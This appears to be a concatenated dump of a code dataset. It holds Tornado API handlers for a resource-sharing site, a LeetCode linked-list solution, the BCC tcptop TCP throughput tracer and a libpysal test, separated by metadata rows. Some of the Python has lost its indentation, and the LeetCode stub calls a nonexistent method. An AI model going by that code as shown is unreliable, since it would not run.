# instance = TopMongoResource()
def get_user_like(self) -> list:
username = self.get_current_user()
return self.instance.get_user_like(username)
def get_most(self) -> list:
return self.instance.get_most()
@run_on_executor()
def get_top_resource(self):
return self.instance.get_top_resource()
@gen.coroutine
def get(self):
resp = yield self.get_top_resource()
self.write(resp)
class IndexHandler(BaseHandler):
@run_on_executor()
def send_index(self):
with open(index, encoding="u8") as f:
html = f.read()
return html
@gen.coroutine
def get(self):
resp = yield self.send_index()
self.write(resp)
class UserHandler(BaseHandler):
class_name = f"User{adapter}Resource"
# from Mongo import UserMongoResource
# instance = UserMongoResource()
def set_login(self, username):
self.set_secure_cookie("username", username, 365)
@run_on_executor()
def login_user(self):
data = self.json
username = data["username"]
password = data["password"]
captcha = data.get("captcha")
captcha_id = data.get("captcha_id", "")
ip = AntiCrawler(self).get_real_ip()
browser = self.request.headers['user-agent']
response = self.instance.login_user(username, password, captcha, captcha_id, ip, browser)
if response["status_code"] in (HTTPStatus.CREATED, HTTPStatus.OK):
self.set_login(username)
else:
self.set_status(response["status_code"])
return response
@run_on_executor()
def update_info(self):
result = self.instance.update_user_info(self.current_user, self.json)
self.set_status(result.get("status_code", HTTPStatus.IM_A_TEAPOT))
return result
@run_on_executor()
def get_user_info(self) -> dict:
username = self.get_current_user()
if username:
data = self.instance.get_user_info(username)
else:
self.set_status(HTTPStatus.UNAUTHORIZED)
data = {"message": "Please try to login"}
return data
@gen.coroutine
def post(self):
resp = yield self.login_user()
self.write(resp)
@gen.coroutine
def get(self):
resp = yield self.get_user_info()
self.write(resp)
# everytime we receive a GET request to this api, we'll update last_date and last_ip
username = self.get_current_user()
if username:
now_ip = AntiCrawler(self).get_real_ip()
self.instance.update_user_last(username, now_ip)
@gen.coroutine
@web.authenticated
def patch(self):
resp = yield self.update_info()
self.write(resp)
class ResourceHandler(BaseHandler):
class_name = f"Resource{adapter}Resource"
# from Mongo import ResourceMongoResource
# instance = ResourceMongoResource()
@run_on_executor()
def get_resource_data(self):
ban = AntiCrawler(self)
if ban.execute():
logging.warning("%s@%s make you happy:-(", self.request.headers.get("user-agent"), ban.get_real_ip())
self.set_status(HTTPStatus.FORBIDDEN)
return {}
else:
resource_id = int(self.get_query_argument("id"))
username = self.get_current_user()
data = self.instance.get_resource_data(resource_id, username)
if not data:
# not found, dangerous
ip = ban.get_real_ip()
ban.imprisonment(ip)
self.set_status(HTTPStatus.NOT_FOUND)
data = {}
return data
@run_on_executor()
def search_resource(self):
kw = self.get_query_argument("keyword").lower()
return self.instance.search_resource(kw)
@gen.coroutine
def get(self):
if self.get_query_argument("id", None):
resp = yield self.get_resource_data()
elif self.get_query_argument("keyword", None):
resp = yield self.search_resource()
else:
resp = "error"
self.write(resp)
# patch and post are available to every login user
# these are rare operations, so no gen.coroutine and run_on_executor
@web.authenticated
def patch(self):
if self.instance.is_admin(self.get_current_user()):
# may consider add admin restrictions
pass
for item in self.json["items"].values():
for i in item:
i["creator"] = self.get_current_user()
i["itemid"] = uuid.uuid4().hex
self.instance.patch_resource(self.json)
self.set_status(HTTPStatus.CREATED)
self.write({})
@web.authenticated
def post(self):
self.json["data"]["list"] = []
self.json["data"]["info"]["creator"] = self.get_current_user()
self.set_status(HTTPStatus.CREATED)
resp = self.instance.add_resource(self.json)
self.write(resp)
@web.authenticated
def delete(self):
if not self.instance.is_admin(self.get_current_user()):
self.set_status(HTTPStatus.FORBIDDEN)
self.write({"status": False, "message": "admin only"})
return
self.instance.delete_resource(self.json)
self.set_status(HTTPStatus.ACCEPTED)
self.write({})
class ResourceLatestHandler(BaseHandler):
class_name = f"ResourceLatest{adapter}Resource"
# from Mongo import ResourceLatestMongoResource
# instance = ResourceLatestMongoResource()
@run_on_executor()
def get_latest(self):
size = int(self.get_query_argument("size", "100"))
result = self.instance.get_latest_resource()
result["data"] = result["data"][:size]
return result
@gen.coroutine
def get(self):
resp = yield self.get_latest()
self.write(resp)
#
# class ResourceLatestHandler(BaseHandler):
# from concurrent.futures import ProcessPoolExecutor
#
# class_name = f"ResourceLatest{adapter}Resource"
# executor = ProcessPoolExecutor(200)
#
# # from Mongo import ResourceLatestMongoResource
# # instance = ResourceLatestMongoResource()
#
# @gen.coroutine
# def get(self):
# # This returns a concurrent.futures.Future
# fut = self.executor.submit(self.instance.get_latest_resource)
# ret = yield fut
# self.write(ret)
class LikeHandler(BaseHandler):
class_name = f"Like{adapter}Resource"
# from Mongo import LikeMongoResource
# instance = UserLikeMongoResource()
@run_on_executor()
def like_data(self):
username = self.get_current_user()
return {"LIKE": self.instance.get_user_like(username)}
@gen.coroutine
@web.authenticated
def get(self):
resp = yield self.like_data()
self.write(resp)
@run_on_executor()
def add_remove_fav(self):
data = self.json
resource_id = int(data["resource_id"])
username = self.get_current_user()
if username:
response = self.instance.add_remove_fav(resource_id, username)
self.set_status(response["status_code"])
else:
response = {"message": "请先登录"}
self.set_status(HTTPStatus.UNAUTHORIZED)
return response["message"]
@gen.coroutine
@web.authenticated
def patch(self):
resp = yield self.add_remove_fav()
self.write(resp)
class NameHandler(BaseHandler):
class_name = f"Name{adapter}Resource"
# from Mongo import NameMongoResource
# instance = NameMongoResource()
@run_on_executor()
def get_names(self):
is_readable = self.get_query_argument("human", None)
return self.instance.get_names(is_readable)
@gen.coroutine
def get(self):
resp = yield self.get_names()
self.write(resp)
class CommentHandler(BaseHandler):
class_name = f"Comment{adapter}Resource"
# from Mongo import CommentMongoResource
# instance = CommentMongoResource()
@staticmethod
def hide_phone(data: list):
for item in data:
if item["username"].isdigit() and len(item["username"]) == 11:
item["username"] = re.sub(r"(\d{3})\d{4}(\d{4})", r"\g<1>****\g<2>", item["username"])
return data
@run_on_executor()
def get_comment(self):
resource_id = int(self.get_argument("resource_id", "0"))
size = int(self.get_argument("size", "5"))
page = int(self.get_argument("page", "1"))
inner_size = int(self.get_argument("inner_size", "5"))
inner_page = int(self.get_argument("inner_page", "1"))
if not resource_id:
self.set_status(HTTPStatus.BAD_REQUEST)
return {"status": False, "message": "请提供resource id"}
comment_data = self.instance.get_comment(resource_id, page, size, inner_size=inner_size, inner_page=inner_page)
self.hide_phone((comment_data["data"]))
return comment_data
@run_on_executor()
def add_comment(self):
payload = self.json
captcha = payload["captcha"]
captcha_id = payload["id"]
content = payload["content"]
resource_id = payload["resource_id"]
comment_id = payload.get("comment_id")
real_ip = AntiCrawler(self).get_real_ip()
username = self.get_current_user()
browser = self.request.headers['user-agent']
result = self.instance.add_comment(captcha, captcha_id, content, resource_id, real_ip,
username, browser, comment_id)
self.set_status(result["status_code"])
return result
@run_on_executor()
def delete_comment(self):
# need resource_id & id
# payload = {"id": "obj_id"}
payload = self.json
username = self.get_current_user()
comment_id = payload["comment_id"]
if self.instance.is_admin(username):
result = self.instance.delete_comment(comment_id)
self.set_status(result["status_code"])
return result
else:
self.set_status(HTTPStatus.UNAUTHORIZED)
return {"count": 0, "message": "You're unauthorized to delete comment."}
@gen.coroutine
def get(self):
resp = yield self.get_comment()
self.write(resp)
@gen.coroutine
@web.authenticated
def post(self):
resp = yield self.add_comment()
self.write(resp)
@gen.coroutine
@web.authenticated
def delete(self):
resp = yield self.delete_comment()
self.write(resp)
class CommentReactionHandler(BaseHandler):
class_name = f"CommentReaction{adapter}Resource"
# from Mongo import CommentReactionMongoResource
# instance = CommentReactionMongoResource()
@run_on_executor()
def comment_reaction(self):
self.json.update(method=self.request.method)
username = self.get_current_user()
result = self.instance.react_comment(username, self.json)
self.set_status(result.get("status_code"))
return result
@gen.coroutine
@web.authenticated
def post(self):
resp = yield self.comment_reaction()
self.write(resp)
@gen.coroutine
@web.authenticated
def delete(self):
resp = yield self.comment_reaction()
self.write(resp)
class CommentChildHandler(CommentHandler):
class_name = f"CommentChild{adapter}Resource"
# from Mongo import CommentChildResource
# instance = CommentChildResource()
@run_on_executor()
def get_comment(self):
parent_id = self.get_argument("parent_id", "0")
size = int(self.get_argument("size", "5"))
page = int(self.get_argument("page", "1"))
if not parent_id:
self.set_status(HTTPStatus.BAD_REQUEST)
return {"status": False, "message": "请提供 parent_id"}
comment_data = self.instance.get_comment(parent_id, page, size)
self.hide_phone((comment_data["data"]))
return comment_data
@gen.coroutine
def get(self):
resp = yield self.get_comment()
self.write(resp)
class CommentNewestHandler(CommentHandler):
class_name = f"CommentNewest{adapter}Resource"
# from Mongo import CommentNewestResource
# instance = CommentNewestResource()
@run_on_executor()
def get_comment(self):
size = int(self.get_argument("size", "5"))
page = int(self.get_argument("page", "1"))
comment_data = self.instance.get_comment(page, size)
self.hide_phone((comment_data["data"]))
return comment_data
@gen.coroutine
def get(self):
resp = yield self.get_comment()
self.write(resp)
class AnnouncementHandler(BaseHandler):
class_name = f"Announcement{adapter}Resource"
# from Mongo import AnnouncementMongoResource
# instance = AnnouncementMongoResource()
@run_on_executor()
def get_announcement(self):
size = int(self.get_argument("size", "5"))
page = int(self.get_argument("page", "1"))
return self.instance.get_announcement(page, size)
@run_on_executor()
def add_announcement(self):
username = self.get_current_user()
if not self.instance.is_admin(username):
self.set_status(HTTPStatus.FORBIDDEN)
return {"message": "只有管理员可以设置公告"}
payload = self.json
content = payload["content"]
real_ip = AntiCrawler(self).get_real_ip()
browser = self.request.headers['user-agent']
self.instance.add_announcement(username, content, real_ip, browser)
self.set_status(HTTPStatus.CREATED)
return {"message": "添加成功"}
@gen.coroutine
def get(self):
resp = yield self.get_announcement()
self.write(resp)
@gen.coroutine
@web.authenticated
def post(self):
resp = yield self.add_announcement()
self.write(resp)
class CaptchaHandler(BaseHandler, CaptchaResource):
@run_on_executor()
def verify_captcha(self):
data = self.json
captcha_id = data.get("id", None)
userinput = data.get("captcha", None)
if captcha_id is None or userinput is None:
self.set_status(HTTPStatus.BAD_REQUEST)
return "Please supply id or captcha parameter."
returned = self.verify_code(userinput, captcha_id)
status_code = returned.get("status")
if not status_code:
self.set_status(HTTPStatus.FORBIDDEN)
return returned
@run_on_executor()
def captcha(self):
request_id = self.get_argument("id", None)
if request_id is None:
self.set_status(HTTPStatus.BAD_REQUEST)
return "Please supply id parameter."
return self.get_captcha(request_id)
@gen.coroutine
def get(self):
resp = yield self.captcha()
self.write(resp)
@gen.coroutine
def post(self):
resp = yield self.verify_captcha()
self.write(resp)
class MetricsHandler(BaseHandler):
class_name = f"Metrics{adapter}Resource"
# from Mongo import MetricsMongoResource
# instance = MetricsMongoResource()
@run_on_executor()
def set_metrics(self):
payload = self.json
metrics_type = payload["type"]
self.instance.set_metrics(metrics_type)
self.set_status(HTTPStatus.CREATED)
return {}
@run_on_executor()
def get_metrics(self):
if not self.instance.is_admin(self.get_current_user()):
self.set_status(HTTPStatus.NOT_FOUND)
return ""
# only return latest 7 days. with days parameter to generate different range
from_date = self.get_query_argument("from", None)
to_date = self.get_query_argument("to", None)
if to_date is None:
to_date = time.strftime("%Y-%m-%d", time.localtime())
if from_date is None:
from_date = time.strftime("%Y-%m-%d", time.localtime(time.time() - 3600 * 24 * 7))
return self.instance.get_metrics(from_date, to_date)
@gen.coroutine
def get(self):
resp = yield self.get_metrics()
self.write(resp)
@gen.coroutine
def post(self):
resp = yield self.set_metrics()
self.write(resp)
class GrafanaIndexHandler(BaseHandler):
def get(self):
self.write({})
class GrafanaSearchHandler(BaseHandler):
def post(self):
data = ["resource", "top", "home", "search", "extra", "discuss", "multiDownload", "download", "user", "share",
"me", "database", "help", "backOld", "favorite", "unFavorite", "comment"]
self.write(json.dumps(data))
class GrafanaQueryHandler(BaseHandler):
class_name = f"GrafanaQuery{adapter}Resource"
# from Mongo import GrafanaQueryMongoResource
# instance = GrafanaQueryMongoResource()
@staticmethod
def generate_date_series(start: str, end: str) -> list:
start_int = [int(i) for i in start.split("-")]
end_int = [int(i) for i in end.split("-")]
sdate = date(*start_int) # start date
edate = date(*end_int) # end date
delta = edate - sdate # as timedelta
days = []
for i in range(delta.days + 1):
day = sdate + timedelta(days=i)
days.append(day.strftime("%Y-%m-%d"))
return days
@staticmethod
def time_str_int(text):
return time.mktime(time.strptime(text, "%Y-%m-%d"))
def post(self):
payload = self.json
start = payload["range"]["from"].split("T")[0]
end = payload["range"]["to"].split("T")[0]
date_series = self.generate_date_series(start, end)
targets = [i["target"] for i in payload["targets"] if i["target"]]
grafana_data = []
for target in targets:
data_points = []
result = self.instance.get_grafana_data(date_series)
i: dict
for i in result:
datum = [i[target], self.time_str_int(i["date"]) * 1000] if i.get(target) else []
data_points.append(datum)
temp = {
"target": target,
"datapoints": data_points
}
grafana_data.append(temp)
self.write(json.dumps(grafana_data))
class BlacklistHandler(BaseHandler):
class_name = f"Blacklist{adapter}Resource"
# from Mongo import BlacklistMongoResource
# instance = BlacklistMongoResource()
@run_on_executor()
def get_black_list(self):
return self.instance.get_black_list()
@gen.coroutine
def get(self):
resp = yield self.get_black_list()
self.write(resp)
class NotFoundHandler(BaseHandler):
def get(self): # for react app
self.render(index)
class DBDumpHandler(BaseHandler):
@staticmethod
def sizeof_fmt(num: int, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
@staticmethod
def ts_date(ts):
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(ts))
def file_info(self, file_path) -> dict:
result = {}
for fp in file_path:
try:
checksum = self.checksum(fp)
creation = self.ts_date(os.stat(fp).st_ctime)
size = self.sizeof_fmt(os.stat(fp).st_size)
result[fp] = [checksum, creation, size]
except Exception as e:
result[fp] = str(e), "", ""
return result
@staticmethod
def checksum(file_path) -> str:
sha = sha1()
try:
with open(file_path, "rb") as f:
sha.update(f.read())
checksum = sha.hexdigest()
except Exception as e:
checksum = str(e)
return checksum
@run_on_executor()
@Redis.cache(3600)
def get_hash(self):
file_list = [
"templates/data/yyets_mongo.gz",
"templates/data/yyets_mysql.zip",
"templates/data/yyets_sqlite.zip"
]
result = {}
data = self.file_info(file_list)
for file, value in data.items():
filename = os.path.basename(file)
result[filename] = {
"checksum": value[0],
"date": value[1],
"size": value[2],
}
return result
@gen.coroutine
def get(self):
resp = yield self.get_hash()
self.write(resp)
class DoubanHandler(BaseHandler):
class_name = f"Douban{adapter}Resource"
# from Mongo import DoubanMongoResource
# instance = DoubanMongoResource()
@run_on_executor()
def douban_data(self):
rid = self.get_query_argument("resource_id")
data = self.instance.get_douban_data(int(rid))
data.pop("posterData")
return data
def get_image(self) -> bytes:
rid = self.get_query_argument("resource_id")
return self.instance.get_douban_image(int(rid))
@gen.coroutine
def get(self):
_type = self.get_query_argument("type", None)
if _type == "image":
data = self.get_image()
self.set_header("content-type", filetype.guess_mime(data))
self.write(data)
else:
resp = yield self.douban_data()
self.write(resp)
class DoubanReportHandler(BaseHandler):
class_name = f"DoubanReport{adapter}Resource"
# from Mongo import DoubanReportMongoResource
# instance = DoubanReportMongoResource()
@run_on_executor()
def get_error(self):
return self.instance.get_error()
@run_on_executor()
def report_error(self):
data = self.json
user_captcha = data["captcha_id"]
captcha_id = data["id"]
content = data["content"]
resource_id = data["resource_id"]
returned = self.instance.report_error(user_captcha, captcha_id, content, resource_id)
status_code = returned.get("status_code", HTTPStatus.CREATED)
self.set_status(status_code)
return self.instance.report_error(user_captcha, captcha_id, content, resource_id)
@gen.coroutine
def post(self):
resp = yield self.report_error()
self.write(resp)
@gen.coroutine
def get(self):
resp = yield self.get_error()
self.write(resp)
class NotificationHandler(BaseHandler):
class_name = f"Notification{adapter}Resource"
# from Mongo import NotificationResource
# instance = NotificationResource()
@run_on_executor()
def get_notification(self):
username = self.get_current_user()
size = int(self.get_argument("size", "5"))
page = int(self.get_argument("page", "1"))
return self.instance.get_notification(username, page, size)
@run_on_executor()
def update_notification(self):
username = self.get_current_user()
verb = self.json["verb"]
comment_id = self.json["comment_id"]
if verb not in ["read", "unread"]:
self.set_status(HTTPStatus.BAD_REQUEST)
return {"status": False, "message": "verb: read or unread"}
self.set_status(HTTPStatus.CREATED)
return self.instance.update_notification(username, verb, comment_id)
@gen.coroutine
@web.authenticated
def get(self):
resp = yield self.get_notification()
self.write(resp)
@gen.coroutine
@web.authenticated
def patch(self):
resp = yield self.update_notification()
self.write(resp)
class UserEmailHandler(BaseHandler):
class_name = f"UserEmail{adapter}Resource"
# from Mongo import UserEmailResource
# instance = UserEmailResource()
@run_on_executor()
def verify_email(self):
result = self.instance.verify_email(self.get_current_user(), self.json["code"])
self.set_status(result.get("status_code"))
return result
@gen.coroutine
@web.authenticated
def post(self):
resp = yield self.verify_email()
self.write(resp)
class CategoryHandler(BaseHandler):
class_name = f"Category{adapter}Resource"
from Mongo import CategoryResource
instance = CategoryResource()
@run_on_executor()
def get_data(self):
self.json = {k: self.get_argument(k) for k in self.request.arguments}
self.json["size"] = int(self.json.get("size", 15))
self.json["page"] = int(self.json.get("page", 1))
self.json["douban"] = self.json.get("douban", False)
return self.instance.get_category(self.json)
@gen.coroutine
def get(self):
resp = yield self.get_data()
self.write(resp)
| 30.076148 | 119 | 0.627113 |
f1518de746aa823bafcd534f1a182c0d9465f9ce | 850 | py | Python | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | easy/21.py | pisskidney/leetcode | 08c19cbf3d7afc897908ea05db4ad11a5487f523 | [
"MIT"
] | null | null | null | """
21. Merge Two Sorted Lists
https://leetcode.com/problems/merge-two-sorted-lists/
"""
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:
root = ListNode()
p = list1
q = list2
r = root
while p and q:
if p.val < q.val:
r.next = p
p = p.next
else:
r.next = q
q = q.next
r = r.next
if p:
r.next = p
if q:
r.next = q
return root.next
def main():
s = Solution()
print(s.xxx())
if __name__ == '__main__':
raise(SystemExit(main()))
| 19.318182 | 104 | 0.497647 |
2d4b7572ecca73027bd482cf0fa94446cfcb48af | 10,077 | py | Python | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | tools/tcptop.py | amadio/bcc | 57e7af7c8ac8e32b2ad62d973ae63edcddc8a32c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# tcptop Summarize TCP send/recv throughput by host.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcptop [-h] [-C] [-S] [-p PID] [interval [count]]
#
# This uses dynamic tracing of kernel functions, and will need to be updated
# to match kernel changes.
#
# WARNING: This traces all send/receives at the TCP level, and while it
# summarizes data in-kernel to reduce overhead, there may still be some
# overhead at high TCP send/receive rates (eg, ~13% of one CPU at 100k TCP
# events/sec. This is not the same as packet rate: funccount can be used to
# count the kprobes below to find out the TCP rate). Test in a lab environment
# first. If your send/receive rate is low (eg, <1k/sec) then the overhead is
# expected to be negligible.
#
# ToDo: Fit output to screen size (top X only) in default (not -C) mode.
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 02-Sep-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
import argparse
from socket import inet_ntop, AF_INET, AF_INET6
from struct import pack
from time import sleep, strftime
from subprocess import call
from collections import namedtuple, defaultdict
# arguments
def range_check(string):
value = int(string)
if value < 1:
msg = "value must be stricly positive, got %d" % (value,)
raise argparse.ArgumentTypeError(msg)
return value
examples = """examples:
./tcptop # trace TCP send/recv by host
./tcptop -C # don't clear the screen
./tcptop -p 181 # only trace PID 181
./tcptop --cgroupmap ./mappath # only trace cgroups in this BPF map
"""
parser = argparse.ArgumentParser(
description="Summarize TCP send/recv throughput by host",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-C", "--noclear", action="store_true",
help="don't clear the screen")
parser.add_argument("-S", "--nosummary", action="store_true",
help="skip system summary line")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("interval", nargs="?", default=1, type=range_check,
help="output interval, in seconds (default 1)")
parser.add_argument("count", nargs="?", default=-1, type=range_check,
help="number of outputs")
parser.add_argument("--cgroupmap",
help="trace cgroups in this BPF map only")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
# linux stats
loadavg = "/proc/loadavg"
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
struct ipv4_key_t {
u32 pid;
u32 saddr;
u32 daddr;
u16 lport;
u16 dport;
};
BPF_HASH(ipv4_send_bytes, struct ipv4_key_t);
BPF_HASH(ipv4_recv_bytes, struct ipv4_key_t);
struct ipv6_key_t {
u32 pid;
unsigned __int128 saddr;
unsigned __int128 daddr;
u16 lport;
u16 dport;
};
BPF_HASH(ipv6_send_bytes, struct ipv6_key_t);
BPF_HASH(ipv6_recv_bytes, struct ipv6_key_t);
#if CGROUPSET
BPF_TABLE_PINNED("hash", u64, u64, cgroupset, 1024, "CGROUPPATH");
#endif
int kprobe__tcp_sendmsg(struct pt_regs *ctx, struct sock *sk,
struct msghdr *msg, size_t size)
{
u32 pid = bpf_get_current_pid_tgid() >> 32;
FILTER
#if CGROUPSET
u64 cgroupid = bpf_get_current_cgroup_id();
if (cgroupset.lookup(&cgroupid) == NULL) {
return 0;
}
#endif
u16 dport = 0, family = sk->__sk_common.skc_family;
if (family == AF_INET) {
struct ipv4_key_t ipv4_key = {.pid = pid};
ipv4_key.saddr = sk->__sk_common.skc_rcv_saddr;
ipv4_key.daddr = sk->__sk_common.skc_daddr;
ipv4_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv4_key.dport = ntohs(dport);
ipv4_send_bytes.increment(ipv4_key, size);
} else if (family == AF_INET6) {
struct ipv6_key_t ipv6_key = {.pid = pid};
bpf_probe_read(&ipv6_key.saddr, sizeof(ipv6_key.saddr),
&sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read(&ipv6_key.daddr, sizeof(ipv6_key.daddr),
&sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
ipv6_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv6_key.dport = ntohs(dport);
ipv6_send_bytes.increment(ipv6_key, size);
}
// else drop
return 0;
}
/*
* tcp_recvmsg() would be obvious to trace, but is less suitable because:
* - we'd need to trace both entry and return, to have both sock and size
* - misses tcp_read_sock() traffic
* we'd much prefer tracepoints once they are available.
*/
int kprobe__tcp_cleanup_rbuf(struct pt_regs *ctx, struct sock *sk, int copied)
{
u32 pid = bpf_get_current_pid_tgid() >> 32;
FILTER
#if CGROUPSET
u64 cgroupid = bpf_get_current_cgroup_id();
if (cgroupset.lookup(&cgroupid) == NULL) {
return 0;
}
#endif
u16 dport = 0, family = sk->__sk_common.skc_family;
u64 *val, zero = 0;
if (copied <= 0)
return 0;
if (family == AF_INET) {
struct ipv4_key_t ipv4_key = {.pid = pid};
ipv4_key.saddr = sk->__sk_common.skc_rcv_saddr;
ipv4_key.daddr = sk->__sk_common.skc_daddr;
ipv4_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv4_key.dport = ntohs(dport);
ipv4_recv_bytes.increment(ipv4_key, copied);
} else if (family == AF_INET6) {
struct ipv6_key_t ipv6_key = {.pid = pid};
bpf_probe_read(&ipv6_key.saddr, sizeof(ipv6_key.saddr),
&sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read(&ipv6_key.daddr, sizeof(ipv6_key.daddr),
&sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
ipv6_key.lport = sk->__sk_common.skc_num;
dport = sk->__sk_common.skc_dport;
ipv6_key.dport = ntohs(dport);
ipv6_recv_bytes.increment(ipv6_key, copied);
}
// else drop
return 0;
}
"""
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('FILTER',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('FILTER', '')
if args.cgroupmap:
bpf_text = bpf_text.replace('CGROUPSET', '1')
bpf_text = bpf_text.replace('CGROUPPATH', args.cgroupmap)
else:
bpf_text = bpf_text.replace('CGROUPSET', '0')
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
TCPSessionKey = namedtuple('TCPSession', ['pid', 'laddr', 'lport', 'daddr', 'dport'])
def pid_to_comm(pid):
try:
comm = open("/proc/%d/comm" % pid, "r").read().rstrip()
return comm
except IOError:
return str(pid)
def get_ipv4_session_key(k):
return TCPSessionKey(pid=k.pid,
laddr=inet_ntop(AF_INET, pack("I", k.saddr)),
lport=k.lport,
daddr=inet_ntop(AF_INET, pack("I", k.daddr)),
dport=k.dport)
def get_ipv6_session_key(k):
return TCPSessionKey(pid=k.pid,
laddr=inet_ntop(AF_INET6, k.saddr),
lport=k.lport,
daddr=inet_ntop(AF_INET6, k.daddr),
dport=k.dport)
# initialize BPF
b = BPF(text=bpf_text)
ipv4_send_bytes = b["ipv4_send_bytes"]
ipv4_recv_bytes = b["ipv4_recv_bytes"]
ipv6_send_bytes = b["ipv6_send_bytes"]
ipv6_recv_bytes = b["ipv6_recv_bytes"]
print('Tracing... Output every %s secs. Hit Ctrl-C to end' % args.interval)
# output
i = 0
exiting = False
while i != args.count and not exiting:
try:
sleep(args.interval)
except KeyboardInterrupt:
exiting = True
# header
if args.noclear:
print()
else:
call("clear")
if not args.nosummary:
with open(loadavg) as stats:
print("%-8s loadavg: %s" % (strftime("%H:%M:%S"), stats.read()))
# IPv4: build dict of all seen keys
ipv4_throughput = defaultdict(lambda: [0, 0])
for k, v in ipv4_send_bytes.items():
key = get_ipv4_session_key(k)
ipv4_throughput[key][0] = v.value
ipv4_send_bytes.clear()
for k, v in ipv4_recv_bytes.items():
key = get_ipv4_session_key(k)
ipv4_throughput[key][1] = v.value
ipv4_recv_bytes.clear()
if ipv4_throughput:
print("%-6s %-12s %-21s %-21s %6s %6s" % ("PID", "COMM",
"LADDR", "RADDR", "RX_KB", "TX_KB"))
# output
for k, (send_bytes, recv_bytes) in sorted(ipv4_throughput.items(),
key=lambda kv: sum(kv[1]),
reverse=True):
print("%-6d %-12.12s %-21s %-21s %6d %6d" % (k.pid,
pid_to_comm(k.pid),
k.laddr + ":" + str(k.lport),
k.daddr + ":" + str(k.dport),
int(recv_bytes / 1024), int(send_bytes / 1024)))
# IPv6: build dict of all seen keys
ipv6_throughput = defaultdict(lambda: [0, 0])
for k, v in ipv6_send_bytes.items():
key = get_ipv6_session_key(k)
ipv6_throughput[key][0] = v.value
ipv6_send_bytes.clear()
for k, v in ipv6_recv_bytes.items():
key = get_ipv6_session_key(k)
ipv6_throughput[key][1] = v.value
ipv6_recv_bytes.clear()
if ipv6_throughput:
# more than 80 chars, sadly.
print("\n%-6s %-12s %-32s %-32s %6s %6s" % ("PID", "COMM",
"LADDR6", "RADDR6", "RX_KB", "TX_KB"))
# output
for k, (send_bytes, recv_bytes) in sorted(ipv6_throughput.items(),
key=lambda kv: sum(kv[1]),
reverse=True):
print("%-6d %-12.12s %-32s %-32s %6d %6d" % (k.pid,
pid_to_comm(k.pid),
k.laddr + ":" + str(k.lport),
k.daddr + ":" + str(k.dport),
int(recv_bytes / 1024), int(send_bytes / 1024)))
i += 1
| 32.401929 | 85 | 0.628262 |
f22c073970b181796df511e591af946f9ffbc9dd | 1,195 | py | Python | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | libpysal/io/iohandlers/tests/test_dat.py | Kanahiro/dbf-df-translator | 6603ca1ac306203bf8c95e6545685c509324a438 | [
"MIT"
] | null | null | null | import unittest
from ...fileio import FileIO as psopen
from ..dat import DatIO
from .... import examples as pysal_examples
import tempfile
import os
class test_DatIO(unittest.TestCase):
def setUp(self):
self.test_file = test_file = pysal_examples.get_path("wmat.dat")
self.obj = DatIO(test_file, "r")
def test_close(self):
f = self.obj
f.close()
self.assertRaises(ValueError, f.read)
def test_read(self):
w = self.obj.read()
self.assertEqual(49, w.n)
self.assertEqual(4.7346938775510203, w.mean_neighbors)
self.assertEqual([0.5, 0.5], list(w[5.0].values()))
def test_seek(self):
self.test_read()
self.assertRaises(StopIteration, self.obj.read)
self.obj.seek(0)
self.test_read()
def test_write(self):
w = self.obj.read()
f = tempfile.NamedTemporaryFile(suffix=".dat")
fname = f.name
f.close()
o = psopen(fname, "w")
o.write(w)
o.close()
wnew = psopen(fname, "r").read()
self.assertEqual(wnew.pct_nonzero, w.pct_nonzero)
os.remove(fname)
if __name__ == "__main__":
unittest.main()
| 25.978261 | 72 | 0.609205 |
461daf837402df13de840b1c692fbdc7f747b923 | 921 | py | Python | examples/src/dbnd_examples/tests/documentation/orchestration/task_pipeline/test_doc_tasks_pipeline_data.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
